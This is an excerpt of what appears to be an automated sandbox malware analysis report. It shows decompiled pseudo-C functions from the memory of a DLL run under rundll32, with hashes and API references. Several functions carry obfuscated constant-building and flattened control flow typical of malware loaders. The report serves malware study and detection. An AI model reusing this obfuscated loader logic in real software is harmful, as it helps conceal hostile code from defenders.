Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: de919cc1e0ccec6da04d410533b74fa8ed15c5e3ac53d37f7e7a76b0bd674094
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: 10516871D2421EEBDF08CFA0D8858EEBBB5FF44324F108199D811B6290D7B85A59CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00258ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00258ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0024F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00258634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00250126(_v32, _v24);
					}
					_t115 = E00254AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00258ae5
0x00258aee
0x00258af5
0x00258afc
0x00258b03
0x00258b0e
0x00258b10
0x00258b15
0x00258b1a
0x00258b21
0x00258b28
0x00258b2f
0x00258b36
0x00258b3d
0x00258b44
0x00258b4b
0x00258b52
0x00258b59
0x00258b60
0x00258b67
0x00258b6e
0x00258b75
0x00258b7c
0x00258b83
0x00258b8a
0x00258b92
0x00258b95
0x00258b98
0x00258b9f
0x00258ba6
0x00258baa
0x00258bb1
0x00258bb8
0x00258bbc
0x00258bc0
0x00258bc7
0x00258bce
0x00258bdc
0x00258bdf
0x00258be6
0x00258bed
0x00258bf8
0x00258bf9
0x00258c01
0x00258c07
0x00258c0a
0x00258c11
0x00258c22
0x00258c22
0x00258c26
0x00000000
0x00000000
0x00258c1c
0x00258c2a
0x00258c1e
0x00258c1e
0x00258c20
0x00258c21
0x00000000
0x00258c21
0x00258c2d
0x00258c42
0x00258c48
0x00258c66
0x00258c7f
0x00258c80
0x00000000
0x00258c86
0x00258c59
0x00258c5e
0x00258c64
0x00000000
0x00000000
0x00258c8e
0x00258c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 98e0b700ff3db2a78b031ca7a9153ce68c3c769ba216408db2d9e4c95d69863f
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: AC515371C0120ADFDF48CFA0C9465EEBBB1FB44314F20819AC412BA2A0D7B91B55CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 002448BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002448BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x25c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00248736(_t105);
				 *0x25ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x25c110;
				 *_t95 = 0x25c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x25c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00241CFA(_v32, _t122) == 0) {
					E0024F536(_v36, _v28, _v24,  *0x25ca38);
					goto L7;
				}
				return 1;
			}

0x002448cb
0x002448cd
0x002448ce
0x002448d1
0x002448d4
0x002448d5
0x002448d6
0x002448db
0x002448e4
0x002448e9
0x002448ec
0x002448f3
0x002448f7
0x002448fb
0x00244902
0x00244909
0x0024490d
0x00244914
0x0024491b
0x00244922
0x0024492e
0x00244933
0x0024493c
0x00244940
0x00244943
0x0024494a
0x00244951
0x00244958
0x0024495c
0x00244963
0x0024496a
0x00244971
0x00244978
0x0024497f
0x00244986
0x0024498d
0x00244994
0x0024499b
0x002449a8
0x002449ab
0x002449b2
0x002449b9
0x002449c2
0x002449c3
0x002449c6
0x002449d6
0x002449db
0x002449e4
0x00244a2c
0x00000000
0x00244a2c
0x002449e6
0x002449e9
0x002449ec
0x002449ee
0x002449f7
0x002449f3
0x002449f4
0x002449f4
0x00244a0f
0x00244a25
0x00000000
0x00244a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6040ce223e63e663660e7c282ca4e66ab98539d7a1d28ceca6d814e1f4394adf
Instruction ID: 01ddb7960a61070386f8248c390cd9f52dbf02ee710c7ee7246a509c08700509
Opcode Fuzzy Hash: 6040ce223e63e663660e7c282ca4e66ab98539d7a1d28ceca6d814e1f4394adf
Instruction Fuzzy Hash: A04166B2C10209EFEB08CFA5D98A4EEFBB1FF44314F20805AD501BA290D7B84A44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002567E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002567E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x25ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x25ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0024F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0025086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0025422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00254F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x002598a6
0x002598a9
0x002598b2
0x002598bf
0x002598c3
0x002598cb
0x002598cd
0x002598d2
0x002598d6
0x002598dd
0x002598e9
0x002598ec
0x002598f3
0x002598fa
0x00259901
0x00259905
0x0025990c
0x00259913
0x0025991c
0x0025991f
0x00259926
0x0025992d
0x00259934
0x00259937
0x0025993b
0x00259942
0x00259949
0x0025994d
0x00259951
0x00259958
0x0025995f
0x00259966
0x0025996a
0x00259971
0x00259978
0x0025997f
0x00259986
0x0025998d
0x00259994
0x0025999b
0x002599a6
0x002599a9
0x002599b0
0x002599b7
0x002599be
0x002599c1
0x002599c8
0x002599cf
0x002599d3
0x002599d7
0x002599de
0x00259a46
0x002599ea
0x00259a2e
0x00259a3b
0x00259a3d
0x002599ec
0x002599f9
0x002599fe
0x00259a04
0x00259a51
0x00259a51
0x00259a06
0x00259a0d
0x00259a19
0x00259a27
0x00000000
0x00259a2d
0x00259a04
0x00259a44
0x00259a44
0x00259a50

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9efeecd22ec748fecd42a79a92aab87f1758bc41987ed21efb88f463ef7091c6
Instruction ID: 9bdf642e03a6c72081ef559689f131d0d6a9077073c88519cf2fcb111af1868b
Opcode Fuzzy Hash: 9efeecd22ec748fecd42a79a92aab87f1758bc41987ed21efb88f463ef7091c6
Instruction Fuzzy Hash: BC410171D0131DDBDB48CFA5D68A4DEBBB0FB14758F208059C515BA290D7B80B49CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00257A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00257A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00257F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0024D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00257a0f
0x00257a15
0x00257a21
0x00257a28
0x00257a2f
0x00257a36
0x00257a3d
0x00257a44
0x00257a48
0x00257a4f
0x00257a56
0x00257a5a
0x00257a61
0x00257a68
0x00257a6c
0x00257a73
0x00257a7a
0x00257a7e
0x00257a86
0x00257a92
0x00257a99
0x00257aa3
0x00257aa5
0x00257aac
0x00257aae
0x00257aae
0x00257ab4
0x00257ae3
0x00257ae4
0x00257ae9
0x00257aec
0x00257aee
0x00000000
0x00257ab6
0x00257ab8
0x00000000
0x00257aba
0x00257ad2
0x00257ad2
0x00257ab8
0x00257ad5
0x00257adc
0x00257adc
0x00257af2
0x00257af4
0x00257af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: 6917ceabbe74c3c6853fe26c2dccf8158559e121d28fbd5d75e4591735271ca7
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: 5421ACB1E10219ABDB44DFA4E88A4AFFBB0FB40309F648059D905B3241E3B54B58CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0025687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0025687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0025674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00256885
0x0025688c
0x00256893
0x00256897
0x0025689b
0x002568a2
0x002568a9
0x002568b0
0x002568be
0x002568c5
0x002568c8
0x002568cf
0x002568da
0x002568e0
0x002568e7
0x002568ee
0x002568f5
0x002568f9
0x00256900
0x00256907
0x0025690e
0x00256915
0x0025691c
0x00256923
0x0025692a
0x0025692e
0x00256950
0x0025695a
0x00256964

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 8bd681a8ade85683859f66aecf50fe5d03dfa023db1b776e78d9eb643655b6a8
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: 5821E0B2D0021EABDB15CFE1C94A9EEFBB5FB14204F108299D521B61A0D3B84B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0024C4FF() {

				return  *[fs:0x30];
			}

0x0024c505

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}

0x10007337
0x1000733f
0x10007345
0x1000734b
0x1000734f
0x10007351
0x10007358
0x1000735e
0x10007361
0x00000000
0x00000000
0x00000000
0x10007361
0x10007363
0x10007363
0x10007369
0x1000736b
0x10007370
0x10007379
0x10007381
0x10007383
0x10007389
0x1000738f
0x10007392
0x00000000
0x00000000
0x00000000
0x10007392
0x10007394
0x10007394
0x1000739b
0x100073a6
0x100073ac
0x100073b7
0x100073bf
0x100073c5
0x100073ce
0x100073d1
0x100073d6
0x100073d8
0x100073de
0x100073e3
0x100073ea
0x100073ed
0x100073f3
0x100073f3
0x100073f9
0x10007400
0x10007403
0x10007409
0x10007409
0x10007415
0x1000741e
0x10007420
0x1000742c
0x1000742f
0x10007435
0x00000000
0x10007435
0x1000742c
0x1000743d

APIs

DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
_free.LIBCMT ref: 10007358

Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758

_free.LIBCMT ref: 1000736B
_free.LIBCMT ref: 10007389
_free.LIBCMT ref: 1000739B
_free.LIBCMT ref: 100073AC
_free.LIBCMT ref: 100073B7
_free.LIBCMT ref: 100073D1
EncodePointer.KERNEL32(00000000), ref: 100073D8
_free.LIBCMT ref: 100073ED
_free.LIBCMT ref: 10007403
InterlockedDecrement.KERNEL32 ref: 10007415
_free.LIBCMT ref: 1000742F

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94

Uniqueness

Uniqueness Score: -1.00%

Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0x6bf92ee
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
